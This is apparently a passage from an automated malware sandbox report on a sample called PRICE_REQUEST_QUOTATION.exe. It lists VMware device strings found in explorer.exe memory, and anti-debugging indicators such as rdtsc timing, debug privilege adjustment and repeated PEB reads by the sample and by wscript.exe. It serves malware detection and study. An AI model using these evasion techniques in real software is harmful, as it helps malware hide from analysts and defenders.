Source: explorer.exe, 00000006.00000000.304126686.000000000DD44000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.66
Source: explorer.exe, 00000006.00000000.286630230.000000000891C000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.313086176.000000000374F000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000006.00000000.276302180.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000006.00000000.290796557.0000000008C5E000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}((
Source: explorer.exe, 00000006.00000000.319747603.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000006.00000000.298466156.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000006.00000000.319747603.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_004088E0 rdtsc 3_2_004088E0
Enables debug privileges
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_7333A402 mov eax, dword ptr fs:[00000030h] 0_2_7333A402
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_7333A706 mov eax, dword ptr fs:[00000030h] 0_2_7333A706
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_7333A744 mov eax, dword ptr fs:[00000030h] 0_2_7333A744
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_7333A616 mov eax, dword ptr fs:[00000030h] 0_2_7333A616
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_7333A6C7 mov eax, dword ptr fs:[00000030h] 0_2_7333A6C7
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A190AF mov eax, dword ptr fs:[00000030h] 3_2_00A190AF
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009D9080 mov eax, dword ptr fs:[00000030h] 3_2_009D9080
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A0F0BF mov ecx, dword ptr fs:[00000030h] 3_2_00A0F0BF
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A0F0BF mov eax, dword ptr fs:[00000030h] 3_2_00A0F0BF
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A0F0BF mov eax, dword ptr fs:[00000030h] 3_2_00A0F0BF
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A53884 mov eax, dword ptr fs:[00000030h] 3_2_00A53884
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A53884 mov eax, dword ptr fs:[00000030h] 3_2_00A53884
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A6B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00A6B8D0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A6B8D0 mov ecx, dword ptr fs:[00000030h] 3_2_00A6B8D0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A6B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00A6B8D0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A6B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00A6B8D0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A6B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00A6B8D0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A6B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00A6B8D0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A0002D mov eax, dword ptr fs:[00000030h] 3_2_00A0002D
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A0002D mov eax, dword ptr fs:[00000030h] 3_2_00A0002D
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A0002D mov eax, dword ptr fs:[00000030h] 3_2_00A0002D
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A0002D mov eax, dword ptr fs:[00000030h] 3_2_00A0002D
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A0002D mov eax, dword ptr fs:[00000030h] 3_2_00A0002D
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A57016 mov eax, dword ptr fs:[00000030h] 3_2_00A57016
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A57016 mov eax, dword ptr fs:[00000030h] 3_2_00A57016
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A57016 mov eax, dword ptr fs:[00000030h] 3_2_00A57016
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009EB02A mov eax, dword ptr fs:[00000030h] 3_2_009EB02A
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009EB02A mov eax, dword ptr fs:[00000030h] 3_2_009EB02A
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009EB02A mov eax, dword ptr fs:[00000030h] 3_2_009EB02A
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009EB02A mov eax, dword ptr fs:[00000030h] 3_2_009EB02A
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00AA4015 mov eax, dword ptr fs:[00000030h] 3_2_00AA4015
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00AA4015 mov eax, dword ptr fs:[00000030h] 3_2_00AA4015
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009F0050 mov eax, dword ptr fs:[00000030h] 3_2_009F0050
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009F0050 mov eax, dword ptr fs:[00000030h] 3_2_009F0050
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A92073 mov eax, dword ptr fs:[00000030h] 3_2_00A92073
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00AA1074 mov eax, dword ptr fs:[00000030h] 3_2_00AA1074
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A061A0 mov eax, dword ptr fs:[00000030h] 3_2_00A061A0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A061A0 mov eax, dword ptr fs:[00000030h] 3_2_00A061A0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A569A6 mov eax, dword ptr fs:[00000030h] 3_2_00A569A6
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A551BE mov eax, dword ptr fs:[00000030h] 3_2_00A551BE
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A551BE mov eax, dword ptr fs:[00000030h] 3_2_00A551BE
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A551BE mov eax, dword ptr fs:[00000030h] 3_2_00A551BE
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A551BE mov eax, dword ptr fs:[00000030h] 3_2_00A551BE
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009FC182 mov eax, dword ptr fs:[00000030h] 3_2_009FC182
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A0A185 mov eax, dword ptr fs:[00000030h] 3_2_00A0A185
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A02990 mov eax, dword ptr fs:[00000030h] 3_2_00A02990
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A641E8 mov eax, dword ptr fs:[00000030h] 3_2_00A641E8
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009DB1E1 mov eax, dword ptr fs:[00000030h] 3_2_009DB1E1
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009DB1E1 mov eax, dword ptr fs:[00000030h] 3_2_009DB1E1
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009DB1E1 mov eax, dword ptr fs:[00000030h] 3_2_009DB1E1
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A0513A mov eax, dword ptr fs:[00000030h] 3_2_00A0513A
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A0513A mov eax, dword ptr fs:[00000030h] 3_2_00A0513A
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009D9100 mov eax, dword ptr fs:[00000030h] 3_2_009D9100
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009D9100 mov eax, dword ptr fs:[00000030h] 3_2_009D9100
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009D9100 mov eax, dword ptr fs:[00000030h] 3_2_009D9100
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009F4120 mov eax, dword ptr fs:[00000030h] 3_2_009F4120
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009F4120 mov eax, dword ptr fs:[00000030h] 3_2_009F4120
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009F4120 mov eax, dword ptr fs:[00000030h] 3_2_009F4120
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009F4120 mov eax, dword ptr fs:[00000030h] 3_2_009F4120
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009F4120 mov ecx, dword ptr fs:[00000030h] 3_2_009F4120
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009FB944 mov eax, dword ptr fs:[00000030h] 3_2_009FB944
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009FB944 mov eax, dword ptr fs:[00000030h] 3_2_009FB944
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009DB171 mov eax, dword ptr fs:[00000030h] 3_2_009DB171
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009DB171 mov eax, dword ptr fs:[00000030h] 3_2_009DB171
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D28CD6 mov eax, dword ptr fs:[00000030h] 17_2_04D28CD6
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CEB8D0 mov eax, dword ptr fs:[00000030h] 17_2_04CEB8D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CEB8D0 mov ecx, dword ptr fs:[00000030h] 17_2_04CEB8D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CEB8D0 mov eax, dword ptr fs:[00000030h] 17_2_04CEB8D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CEB8D0 mov eax, dword ptr fs:[00000030h] 17_2_04CEB8D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CEB8D0 mov eax, dword ptr fs:[00000030h] 17_2_04CEB8D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CEB8D0 mov eax, dword ptr fs:[00000030h] 17_2_04CEB8D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D114FB mov eax, dword ptr fs:[00000030h] 17_2_04D114FB
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD6CF0 mov eax, dword ptr fs:[00000030h] 17_2_04CD6CF0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD6CF0 mov eax, dword ptr fs:[00000030h] 17_2_04CD6CF0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD6CF0 mov eax, dword ptr fs:[00000030h] 17_2_04CD6CF0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C59080 mov eax, dword ptr fs:[00000030h] 17_2_04C59080
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD3884 mov eax, dword ptr fs:[00000030h] 17_2_04CD3884
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD3884 mov eax, dword ptr fs:[00000030h] 17_2_04CD3884
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6849B mov eax, dword ptr fs:[00000030h] 17_2_04C6849B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C990AF mov eax, dword ptr fs:[00000030h] 17_2_04C990AF
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8F0BF mov ecx, dword ptr fs:[00000030h] 17_2_04C8F0BF
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8F0BF mov eax, dword ptr fs:[00000030h] 17_2_04C8F0BF
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8F0BF mov eax, dword ptr fs:[00000030h] 17_2_04C8F0BF
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8A44B mov eax, dword ptr fs:[00000030h] 17_2_04C8A44B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C70050 mov eax, dword ptr fs:[00000030h] 17_2_04C70050
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C70050 mov eax, dword ptr fs:[00000030h] 17_2_04C70050
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CEC450 mov eax, dword ptr fs:[00000030h] 17_2_04CEC450
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CEC450 mov eax, dword ptr fs:[00000030h] 17_2_04CEC450
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D12073 mov eax, dword ptr fs:[00000030h] 17_2_04D12073
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D21074 mov eax, dword ptr fs:[00000030h] 17_2_04D21074
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C7746D mov eax, dword ptr fs:[00000030h] 17_2_04C7746D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D24015 mov eax, dword ptr fs:[00000030h] 17_2_04D24015
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D24015 mov eax, dword ptr fs:[00000030h] 17_2_04D24015
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD6C0A mov eax, dword ptr fs:[00000030h] 17_2_04CD6C0A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD6C0A mov eax, dword ptr fs:[00000030h] 17_2_04CD6C0A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD6C0A mov eax, dword ptr fs:[00000030h] 17_2_04CD6C0A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD6C0A mov eax, dword ptr fs:[00000030h] 17_2_04CD6C0A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD7016 mov eax, dword ptr fs:[00000030h] 17_2_04CD7016
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD7016 mov eax, dword ptr fs:[00000030h] 17_2_04CD7016
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD7016 mov eax, dword ptr fs:[00000030h] 17_2_04CD7016
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D2740D mov eax, dword ptr fs:[00000030h] 17_2_04D2740D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D2740D mov eax, dword ptr fs:[00000030h] 17_2_04D2740D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D2740D mov eax, dword ptr fs:[00000030h] 17_2_04D2740D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8BC2C mov eax, dword ptr fs:[00000030h] 17_2_04C8BC2C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6B02A mov eax, dword ptr fs:[00000030h] 17_2_04C6B02A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6B02A mov eax, dword ptr fs:[00000030h] 17_2_04C6B02A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6B02A mov eax, dword ptr fs:[00000030h] 17_2_04C6B02A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6B02A mov eax, dword ptr fs:[00000030h] 17_2_04C6B02A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D08DF1 mov eax, dword ptr fs:[00000030h] 17_2_04D08DF1
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5B1E1 mov eax, dword ptr fs:[00000030h] 17_2_04C5B1E1
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5B1E1 mov eax, dword ptr fs:[00000030h] 17_2_04C5B1E1
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5B1E1 mov eax, dword ptr fs:[00000030h] 17_2_04C5B1E1
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CE41E8 mov eax, dword ptr fs:[00000030h] 17_2_04CE41E8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6D5E0 mov eax, dword ptr fs:[00000030h] 17_2_04C6D5E0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6D5E0 mov eax, dword ptr fs:[00000030h] 17_2_04C6D5E0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C7C182 mov eax, dword ptr fs:[00000030h] 17_2_04C7C182
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8A185 mov eax, dword ptr fs:[00000030h] 17_2_04C8A185
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C52D8A mov eax, dword ptr fs:[00000030h] 17_2_04C52D8A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C52D8A mov eax, dword ptr fs:[00000030h] 17_2_04C52D8A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C52D8A mov eax, dword ptr fs:[00000030h] 17_2_04C52D8A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C52D8A mov eax, dword ptr fs:[00000030h] 17_2_04C52D8A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C52D8A mov eax, dword ptr fs:[00000030h] 17_2_04C52D8A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8FD9B mov eax, dword ptr fs:[00000030h] 17_2_04C8FD9B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8FD9B mov eax, dword ptr fs:[00000030h] 17_2_04C8FD9B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C861A0 mov eax, dword ptr fs:[00000030h] 17_2_04C861A0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C861A0 mov eax, dword ptr fs:[00000030h] 17_2_04C861A0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C835A1 mov eax, dword ptr fs:[00000030h] 17_2_04C835A1
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C7B944 mov eax, dword ptr fs:[00000030h] 17_2_04C7B944
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C7B944 mov eax, dword ptr fs:[00000030h] 17_2_04C7B944
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C93D43 mov eax, dword ptr fs:[00000030h] 17_2_04C93D43
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD3540 mov eax, dword ptr fs:[00000030h] 17_2_04CD3540
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C77D50 mov eax, dword ptr fs:[00000030h] 17_2_04C77D50
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5C962 mov eax, dword ptr fs:[00000030h] 17_2_04C5C962
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C7C577 mov eax, dword ptr fs:[00000030h] 17_2_04C7C577
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C7C577 mov eax, dword ptr fs:[00000030h] 17_2_04C7C577
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5B171 mov eax, dword ptr fs:[00000030h] 17_2_04C5B171
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5B171 mov eax, dword ptr fs:[00000030h] 17_2_04C5B171
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C59100 mov eax, dword ptr fs:[00000030h] 17_2_04C59100
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C59100 mov eax, dword ptr fs:[00000030h] 17_2_04C59100
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C59100 mov eax, dword ptr fs:[00000030h] 17_2_04C59100
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D28D34 mov eax, dword ptr fs:[00000030h] 17_2_04D28D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C74120 mov eax, dword ptr fs:[00000030h] 17_2_04C74120
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C74120 mov eax, dword ptr fs:[00000030h] 17_2_04C74120
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C74120 mov eax, dword ptr fs:[00000030h] 17_2_04C74120
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C74120 mov eax, dword ptr fs:[00000030h] 17_2_04C74120
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C74120 mov ecx, dword ptr fs:[00000030h] 17_2_04C74120
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8513A mov eax, dword ptr fs:[00000030h] 17_2_04C8513A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8513A mov eax, dword ptr fs:[00000030h] 17_2_04C8513A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h] 17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h] 17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h] 17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h] 17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h] 17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h] 17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h] 17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h] 17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h] 17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h] 17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h] 17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h] 17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h] 17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C84D3B mov eax, dword ptr fs:[00000030h] 17_2_04C84D3B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C84D3B mov eax, dword ptr fs:[00000030h] 17_2_04C84D3B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C84D3B mov eax, dword ptr fs:[00000030h] 17_2_04C84D3B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5AD30 mov eax, dword ptr fs:[00000030h] 17_2_04C5AD30
